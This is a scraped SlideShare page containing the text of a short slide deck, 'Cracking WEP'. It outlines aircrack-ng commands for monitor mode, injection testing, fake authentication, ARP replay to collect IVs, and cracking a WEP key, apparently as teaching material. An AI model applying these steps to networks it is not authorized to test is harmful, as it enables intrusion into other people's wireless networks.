Se ha denunciado esta presentación.
Se está descargando tu SlideShare. ×

1 CRACKING WEP.pptx

Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Próximo SlideShare
Wireless Hacking Fast Track
Wireless Hacking Fast Track
Cargando en…3
×

Eche un vistazo a continuación

1 de 10 Anuncio

Más Contenido Relacionado

Similares a 1 CRACKING WEP.pptx (20)

Más reciente (20)

Anuncio

1 CRACKING WEP.pptx

  1. 1. WIRELESS ATTACK (CRACKING WEP)
  2. 2. Requirements  Attacking Machine : Supported Wireless Card  Kali Linux : aircrack-ng  Wireless Access Point : using WEP security  Access Point’s Client : any devices
  3. 3. Preparing Wireless Card 1) Preparing Wireless Interface Card identify wireless interface name : ifconfig identify driver and chipset : airmon-ng identify wireless card mode : iwconfig identify and kill interference process : airmon-ng <check | check kill> change to monitor mode : airmon-ng start <interface>
  4. 4. Preparing Wireless Card
  5. 5. Injection Test 2) Injection Test scan active access points : airodump-ng <interface> scan for specific channel : airodump-ng -c <channel> <interface> test the target AP : aireplay-ng
  6. 6. Injection Test
  7. 7. Create Initialization Vector 3) Generate Initializing Vector (IV) Capture ARP Packets : airodump-ng -c -bssid -w <interface> Fake authentication : aireplay-ng -1 0 -e -a -h <interface> ARP injection : aireplay-ng -3 -b -h <interface>
  8. 8. Injection Test
  9. 9. Crack The Password 4) Crack the Password crack WEP key : aircrack-ng <IV_file> if fail regenerate IV to capture enough data 
  10. 10. Crack The Password

×